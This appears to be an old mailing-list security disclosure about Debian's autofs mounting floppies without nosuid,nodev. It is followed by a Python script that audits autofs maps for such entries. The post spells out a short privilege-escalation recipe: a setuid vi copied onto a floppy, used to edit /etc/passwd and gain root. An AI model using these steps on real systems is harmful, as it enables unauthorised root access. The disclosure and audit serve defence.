SECURITY PROBLEM: autofs [all versions]
I'm obviously doing something wrong ...
I've written to the maintainer of the autofs package according to the
page summary listed under 'packages' from the website, and as I also saw
somewhere else (dpkg -s listing?). I filed a bug report against autofs
and marked it as release critical. I have heard nothing for the past
two (three?) days and need to make this known:
There is a severe security problem for all Debian machines running any
version of autofs and having a floppy drive available as /dev/fd0. The
options listed in /etc/auto.misc fail to include the options
"nosuid,nodev" and as such anyone with a floppy disk and physical access
to a floppy drive may become root on that machine.
Here is the 'sploit:
# superformat /dev/fd0u1440
# mke2fs /dev/fd0
# cp /usr/bin/vi /var/autofs/floppy
# chmod u+s /var/autofs/floppy/vi
# umount /var/autofs/floppy
[sneakernet to victim]
% /var/autofs/floppy/vi /etc/passwd
:wq!
% telnet localhost
[...]
Well, you get the idea. All user-modifiable filesystems must be mounted
nosuid,nodev or the systems that trust them can be trivially
compromised. Besides floppy, this also includes the 'removable'
/dev/hdd, and possibly the CD-ROM as well.
regards,
Christopher
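
An audit for the misconfiguration described in the message above, as an added example that is not part of the original post or of the autofs package: it parses an autofs map in the `key [-options] location` format and reports local device entries whose effective options lack nosuid or nodev. The sample map, the function names, and the restriction to `:/dev/` locations are assumptions made for illustration.

```python
REQUIRED = ("nosuid", "nodev")

# Constructed sample in the autofs map format: key [-options] location
SAMPLE_MAP = """\
# constructed sample map, not copied from any package
floppy    -fstype=auto                     :/dev/fd0
cd        -fstype=iso9660,ro,nosuid,nodev  :/dev/cdrom
removable -fstype=ext2,nosuid              :/dev/hdd
zip       -fstype=vfat,nosuid,nodev,suid   :/dev/sda4
kernel    -ro,soft,intr                    ftp.kernel.org:/pub/linux
"""

def effective_flags(options):
    """Resolve suid/nosuid and dev/nodev; a later option overrides an earlier one."""
    state = {"nosuid": False, "nodev": False}
    for opt in options:
        if opt in ("suid", "nosuid"):
            state["nosuid"] = opt == "nosuid"
        elif opt in ("dev", "nodev"):
            state["nodev"] = opt == "nodev"
    return state

def audit_map(text):
    """Return [(key, location, missing_options)] for local-device entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("+"):  # blank, comment, or included map
            continue
        fields = line.split()
        key, rest = fields[0], fields[1:]
        options = []
        if rest and rest[0].startswith("-"):
            options = rest[0][1:].split(",")
            rest = rest[1:]
        for location in rest:
            if not location.startswith(":/dev/"):  # assumption: audit local devices only
                continue
            state = effective_flags(options)
            missing = [o for o in REQUIRED if not state[o]]
            if missing:
                findings.append((key, location, missing))
    return findings

if __name__ == "__main__":
    for key, location, missing in audit_map(SAMPLE_MAP):
        print(f"{key}: {location} mounted without {','.join(missing)}")
```

To audit a real system, pass the contents of the map file (for example /etc/auto.misc, the file named in the message) to audit_map() instead of the sample.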